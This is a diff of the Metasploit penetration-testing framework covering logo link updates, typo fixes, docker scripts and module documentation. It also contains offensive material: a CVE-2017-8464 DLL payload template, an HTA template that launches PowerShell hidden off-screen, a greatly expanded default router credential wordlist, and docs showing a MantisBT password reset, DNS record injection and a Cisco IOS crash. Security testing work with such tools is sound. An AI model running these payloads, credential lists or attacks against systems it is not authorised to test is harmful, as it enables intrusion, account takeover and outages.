DllMain@12

3
data/exploits/cve-2017-8464/src/template.h Normal file
View File

@ -0,0 +1,3 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";

18
data/exploits/cve-2017-8464/src/template.rc Normal file
View File

@ -0,0 +1,18 @@
LANGUAGE 9, 1
VS_VERSION_INFO VERSIONINFO
FILEVERSION 0,0,0,1
PRODUCTVERSION 0,0,0,1
FILEFLAGSMASK 0x17L
FILEFLAGS 0x0L
FILEOS 0x4L
FILETYPE 0x2L
FILESUBTYPE 0x0L
BEGIN
END
#define RT_HTML 23

BIN
data/exploits/cve-2017-8464/template_x64_windows.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2017-8464/template_x86_windows.dll Executable file
View File

Binary file not shown.

2
data/exploits/psnuffle/smb.rb
View File

@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
return "NTLMv1"
end
else
raise RuntimeError, "Unknow hash type"
raise RuntimeError, "Unknown hash type"
end
end

2
data/logos/3kom-superhack.txt
View File

@ -15,5 +15,5 @@
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
| http://metasploit.com |
| https://metasploit.com |
|______________________________________________________________________________|%clr

2
data/logos/metasploit-shield.txt
View File

@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.com
%clr%bld https://metasploit.com

2
data/logos/missile-command.txt
View File

@ -27,4 +27,4 @@
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
http://metasploit.com%clr
https://metasploit.com%clr

2
data/logos/ninja.txt
View File

@ -27,4 +27,4 @@
# # ### # # ##
########################
## ## ## ##
http://metasploit.com%clr
https://metasploit.com%clr

2
data/logos/r7-metasploit.txt
View File

@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

2
data/logos/wake-up-neo.txt
View File

@ -23,4 +23,4 @@
; ,''-,;' ``-
``-..__``--`
http://metasploit.com%clr
https://metasploit.com%clr

2
data/markdown_doc/auxiliary_scanner_template.erb
View File

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
Other examples of setting the RHSOTS option:
Other examples of setting the RHOSTS option:
Example 1:

2
data/msfcrawler/basic.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/comments.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/forms.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/frames.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/image.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/link.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/objects.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/scripts.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

BIN
data/post/bypassuac-x64.dll
View File

Binary file not shown.

BIN
data/post/bypassuac-x86.dll
View File

Binary file not shown.

12
data/templates/scripts/to_powershell.hta.template
View File

@ -1,8 +1,12 @@
<script language="VBScript">
Set %{var_shell} = CreateObject("Wscript.Shell")
window.moveTo -4000, -4000
Set %{var_shell} = CreateObject("Wscript.Shell")
Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
%{var_shell}.Run "%{powershell}",0
End If
For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
%{var_shell}.Run "%{powershell}",0
Exit For
End If
Next
window.close()
</script>

41
data/templates/src/elf/exe/elf_aarch64_template.s Executable file
View File

@ -0,0 +1,41 @@
; build with:
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
BITS 64
org 0
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xB7 ; e_machine = AARCH64
dd 0 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:

BIN
data/templates/template_aarch64_linux.bin Normal file
View File

Binary file not shown.

BIN
data/templates/template_x64_windows_dccw_gdiplus.dll
View File

Binary file not shown.

BIN
data/templates/template_x86_windows_dccw_gdiplus.dll
View File

Binary file not shown.

2
data/webcam/answerer.html
View File

@ -188,7 +188,7 @@
</div>
</div>
<div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div>
</body>
</html>

2
data/webcam/offerer.html
View File

@ -195,7 +195,7 @@
</div>
<div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div>
</body>

355
data/wordlists/routers_userpass.txt
View File

@ -1,70 +1,100 @@
root
ADMINISTRATOR ADMINISTRATOR
ADMN admn
Admin admin
Administrator
Administrator 3ware
Administrator admin
Administrator changeme
Administrator ganteng
Administrator letmein
Administrator password
Administrator pilou
Administrator smcadmin
Any 12345
CSG SESAME
Cisco Cisco
D-Link D-Link
DTA TJM
GEN1 gen1
GEN2 gen2
GlobalAdmin GlobalAdmin
HTTP HTTP
IntraStack Asante
IntraSwitch Asante
JDE JDE
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
MDaemon MServer
MICRO RSX
Manager Manager
Manager friend
NAU NAU
NETWORK NETWORK
NICONEX NICONEX
PBX PBX
PFCUser 240653C9467E45
PRODDTA PRODDTA
PSEAdmin $secure$
PlcmSpIp PlcmSpIp
Polycom SpIp
RMUser1 password
SYSADM sysadm
Sweex Mysweex
USERID PASSW0RD
User Password
VNC winterm
VTech VTech
ZXDSL ZXDSL
acc acc
adfexc adfexc
adm
admin
guest
root root
root password
root 1234
root 12345
root 123456
root 3ep5w2u
root admin
root Admin
root admin_1
root alpine
root ascend
root attack
root blender
root calvin
root changeme
root Cisco
root cms500
root davox
root default
root fivranne
root ggdaseuaimhrke
root iDirect
root letacla
root Mau'dib
root pass
root permit
root ROOT500
root tini
root tslinux
root wyse
ro ro
router router
rwa rwa
rw rw
ubnt ubnt
guest guest
guest User
admin 0
admin 0000
admin 1111
admin 11111111
admin 123
admin 1234
admin 123456
admin 1234567890
admin 1234admin
admin 2222
admin 22222
admin2 changeme
admin 3477
admin 3ascotel
admin 7ujMko0admin
admin 7ujMko0vizxv
admin 9999
admin Admin
admin AitbISP4eCiG
admin Ascend
admin BRIDGE
admin Intel
admin MiniAP
admin NetCache
admin NetICs
admin OCS
admin P@55w0rd!
admin PASSWORD
admin Protector
admin SMDR
admin SUPER
admin Symbol
admin TANDBERG
admin _Cisco
admin access
admin admin
admin Admin
Admin admin
admin admin117.35.97.74
admin admin123
admin admin1234
admin administrator
admin adminttd
admin adslolitec
admin adslroot
admin adtran
admin AitbISP4eCiG
admin articon
admin asante
admin ascend
admin Ascend
admin asd
admin atc123
admin atlantis
@ -72,11 +102,9 @@ admin backdoor
admin barricade
admin barricadei
admin bintec
admin BRIDGE
admin cableroot
admin changeme
admin cisco
admin _Cisco
admin comcomcom
admin conexant
admin default
@ -84,96 +112,79 @@ admin diamond
admin enter
admin epicrouter
admin extendnet
admin fliradmin
admin giraff
admin hagpolm1
admin hello
admin help
admin hp.com
admin Intel
admin ironport
admin isee
acc acc
adfexc adfexc
adm
admin jvc
admin kont2004
admin letmein
admin leviton
admin linga
admin meinsma
admin michaelangelo
admin michelangelo
admin microbusiness
admin MiniAP
admin motorola
admin mu
admin my_DEMARC
admin netadmin
admin NetCache
admin NetICs
admin noway
admin OCS
admin oelinux123
admin operator
admin P@55w0rd!
admin password
admin p-assword
admin PASSWORD
admin pass
admin password
admin passwort
admin pento
admin pfsense
admin private
admin Protector
admin public
admin pwp
admin radius
admin rmnetlm
admin root
admin secure
admin service
admin setup
admin sitecom
admin smallbusiness
admin smcadmin
admin SMDR
admin speedxess
admin SUPER
admin superuser
admin support
admin switch
admin Symbol
admin synnet
admin sysAdmin
admin system
admin TANDBERG
admin tech
admin ubnt
admin visual
admin w2402
admin xad$|#12
admin wbox
admin xad$l#12
admin xad$|#12
admin zoomadsl
system change_on_install
system/manager sys/change_on_install
system password
system sys
admin2 changeme
administrator administrator
administrator changeme
adminstat OCS
adminstrator changeme
adminttd adminttd
adminuser OCS
adminview OCS
adminstat OCS
adminstrator changeme
Administrator 3ware
Administrator admin
administrator administrator
ADMINISTRATOR ADMINISTRATOR
administrator changeme
Administrator changeme
Administrator ganteng
Administrator letmein
Administrator password
Administrator pilou
Administrator smcadmin
ADMN admn
alpine alpine
ami
anonymous any@
anonymous Exabyte
Any 12345
anonymous any@
apc apc
at4400 at4400
bbsd-client changeme2
bbsd-client NULL
bbsd-client changeme2
bciim bciimpw
bcim bcimpw
bcms bcmspw
@ -191,7 +202,6 @@ cellit cellit
cgadmin cgadmin
cisco
cisco cisco
Cisco Cisco
citel citel
client client
cmaker cmaker
@ -201,15 +211,19 @@ craft
craft craft
craft craftpw
craft crftpw
CSG SESAME
cusadmin highspeed
cust custpw
customer
customer none
dadmin dadmin01
daemon
davox davox
debug d.e.b.u.g
debug synnet
default
default antslq
default default
default password
deskalt password
deskman changeme
desknorm password
@ -220,41 +234,39 @@ dhs3pms dhs3pms
diag danger
diag switch
disttech 4tas
D-Link D-Link
draytek 1234
DTA TJM
e250 e250changeme
e500 e500changeme
echo echo
echo User
echo echo
enable
eng engineer
enquiry enquirypw
field support
GEN1 gen1
GEN2 gen2
GlobalAdmin GlobalAdmin
guest
guest 1111
guest 12345
guest 123456
guest User
guest guest
guest xc3511
halt tlah
helpdesk OCS
hsa hsadb
hscroot abc123
HTTP HTTP
hydrasna
iclock timely
images images
inads inads
inads indspw
init initpw
installer installer
install llatsni
install secret
installer installer
intel intel
intermec intermec
intermec intermec1QTPS
IntraStack Asante
IntraSwitch Asante
jagadmin
JDE JDE
kermit kermit
l2 l2
l3 l3
@ -266,8 +278,6 @@ login access
login admin
login password
lp lp
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
m1122 m1122
mac
maint maint
@ -278,50 +288,41 @@ manage !manage
manager admin
manager change_on_install
manager friend
Manager friend
manager manager
Manager Manager
manager sys
manuf xxyyzz
MDaemon MServer
mediator mediator
MICRO RSX
mg3500 merlin
mlusr mlusr
monitor monitor
mother fucker
mtch mtch
mtcl
mtcl mtcl
naadmin naadmin
NAU NAU
netangr attack
netman
netman netman
netopia netopia
netrangr attack
netscreen netscreen
NETWORK NETWORK
NICONEX NICONEX
nms nmspw
nokai nokai
nokia nokia
none 0
none admin
operator
operator 1234
operator $chwarzepumpe
operator operator
op op
op operator
operator
operator $chwarzepumpe
operator 1234
operator operator
oracle oracle
patrol patrol
PBX PBX
PFCUser 240653C9467E45
piranha piranha
piranha q
pmd
poll tech
Polycom SpIp
PRODDTA PRODDTA
PSEAdmin $secure$
public
public public
radware radware
@ -331,7 +332,89 @@ readonly lucenttech2
readwrite lucenttech1
recovery recovery
replicator replicator
RMUser1 password
ro ro
root
root 000000
root 1111
root 1234
root 12345
root 123456
root 1234567890
root 1234qwer
root 123qwe
root 1q2w3e4r5
root 3ep5w2u
root 54321
root 666666
root 7ujMko0admin
root 7ujMko0vizxv
root 888888
root Admin
root Cisco
root GMB182
root LSiuY7pOmZG2s
root Mau'dib
root PASSWORD
root ROOT500
root Serv4EMC
root Zte521
root abc123
root admin
root admin1234
root admin_1
root ahetzip8
root alpine
root anko
root antslq
root ascend
root attack
root avtech
root b120root
root bananapi
root blender
root calvin
root changeme
root cms500
root comcom
root coolphoenix579
root davox
root default
root dreambox
root fivranne
root ggdaseuaimhrke
root hi3518
root iDirect
root ikwb
root ikwd
root jauntech
root juantech
root jvbzd
root klv123
root klv1234
root letacla
root maxided
root oelinux123
root openssh
root openvpnas
root orion99
root pa55w0rd
root pass
root password
root permit
root realtek
root root
root tini
root tslinux
root user
root vizxv
root wyse
root xc3511
root xmhdipc
root zlxx.
root zte9x15
router router
rw rw
rwa rwa
sa
scmadmin scmchangeme
scout scout
@ -346,44 +429,55 @@ smc smcadmin
spcl 0
storwatch specialist
stratacom stratauser
su super
super 5777364
super super
super surt
super.super
super.super master
superadmin secret
superman 21241036
superman talent
super super
super.super
super.super master
super surt
superuser
superuser 123456
superuser admin
supervisor PlsChgMe!
supervisor PlsChgMe1
supervisor supervisor
supervisor zyad1234
support 123
support 1234
support 12345
support 123456
support admin
support h179350
support login
support support
support supportpw
su super
Sweex Mysweex
support zlxx.
sys uplink
sysadm Admin
sysadm PASS
sysadm anicust
sysadm sysadm
sysadmin PASS
sysadmin password
sysadmin sysadmin
sysadm PASS
sysadm sysadm
SYSADM sysadm
sys uplink
system change_on_install
system password
system sys
system/manager sys/change_on_install
target password
teacher password
tech
tech ANYCOM
tech field
tech ILMI
tech field
tech tech
telco telco
telecom telecom
tellabs tellabs#1
telnet telnet
temp1 password
test test
tiara tiaranet
@ -391,19 +485,17 @@ tiger tiger123
topicalt password
topicnorm password
topicres password
ubnt ubnt
user
USERID PASSW0RD
user 123456
user pass
user password
User Password
user public
user tivonpw
user user
vcr NetVCR
VNC winterm
volition volition
vt100 public
VTech VTech
webadmin 1234
webadmin webadmin
websecadm changeme
@ -412,4 +504,3 @@ wradmin trancell
write private
xd xd
xxx cascade
ZXDSL ZXDSL

2
docker-compose.yml
View File

@ -4,7 +4,7 @@ services:
image: metasploit
build:
context: .
dockerfile: ./docker/Dockerfile
dockerfile: ./Dockerfile
environment:
DATABASE_URL: postgres://postgres@db:5432/msf
links:

4
docker/bin/msfvenom
View File

@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path))
fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@"

26
docker/bin/msfvenom-dev Executable file
View File

@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"

4
documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md
View File

@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output
## Scenarios
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular)
### 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > auxiliary/admin/chromecast/chromecast_youtube

30
documentation/modules/auxiliary/admin/dns/dns_dyn_update.md Normal file
View File

@ -0,0 +1,30 @@
# Dynamic DNS Update Injection
`dyn_dns_update` module allows adding or deleting DNS records
on a DNS server that allows unrestricted dynamic updates.
## Vulnerable Application
Any DNS server that allows dynamic update for none trusted source IPs.
## Verification Steps
1. Start msfconsole
2. Do: ```auxiliary/scanner/dns/dyn_dns_update```
3. Do: ```set DOMAIN [IP]```
4. Do: ```set NS [IP]```
5. Do: ```set INJECTDOMAIN [IP]```
6. Do: ```set INJECTIP [IP]```
7. Do: ```set ACTION ADD```
8. Do: ```run```
## Actions
There are two kind of actions the module can run:
1. **ADD** - Add a new record. [Default]
2. **DEL** - Delete an existing record.
## Targeting Information
WPAD may not work with Windows 2008+ targets due to a DNS block list: https://technet.microsoft.com/en-us/library/cc995261.aspx

30
documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md Normal file
View File

@ -0,0 +1,30 @@
## Vulnerable Application
MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
on
[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfully changed.
## Scenarios
```
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set rport 8082
rport => 8082
msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > run
[+] Password successfully changed to 'ndOQTmhQ'.
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_password_reset) >
```

2
documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md
View File

@ -27,7 +27,7 @@
7. You should get credentials
## Sample Output
## Scenarios
```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'

0
documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md Normal file
View File

15
documentation/modules/auxiliary/client/hwbridge/connect.md
View File

@ -28,13 +28,14 @@ Bluetooth HWBridge adapters, depending on the Operating System, may take several
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
1. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
2. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
3. Start bluetoothctl: `bluetoothctl`
4. Turn on scanning: `scan on`
5. Turn on agent: `agent on`
6. Make sure we can see OBDII: `devices`
7. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
1. Most Bluetooth HWBridge adapters, speak serial. So you will need to get the ruby gem "serialport": ```gem install serialport```
2. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
3. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
4. Start bluetoothctl: `bluetoothctl`
5. Turn on scanning: `scan on`
6. Turn on agent: `agent on`
7. Make sure we can see OBDII: `devices`
8. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
```
Attempting to pair with 00:0D:18:AA:AA:AA

161
documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md Normal file
View File

@ -0,0 +1,161 @@
## Vulnerable Application
1. Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
2. Enable telnet access and verify that you can reach the switch normally via that mode.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/dos/cisco/ios_telnet_rocem`
3. Do: `set RHOST 192.168.1.10`
4. Do: ```run```
5. The switch should restart and display crash information on the console.
## Scenarios
```
Switch#sh ver
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02C00000
ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
Switch uptime is 1 hour, 28 minutes
System returned to ROM by power-on
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02F00000
[...]
Election Complete
Switch 2 booting as Master
Waiting for Port download...Complete
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
Switch#
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
-Traceback= 41414140
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
Buffered messages:
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:50: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
Queued messages:
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
Instruction Access Exception (0x0400)!
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
Stack trace:
PC = 0x41414140, SP = 0x02DDEE80
Frame 00: SP = 0x41414141 PC = 0x41414141
Switch uptime is 37 minutes, 22 seconds
[... rebooting ... ]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
Failed to generate persistent self-signed certificate.
Secure server will use temporary self-signed certificate.
Press RETURN to get started!
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
Switch>
Switch>as changed to state DOWN
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:32: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
Switch>
Switch>
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
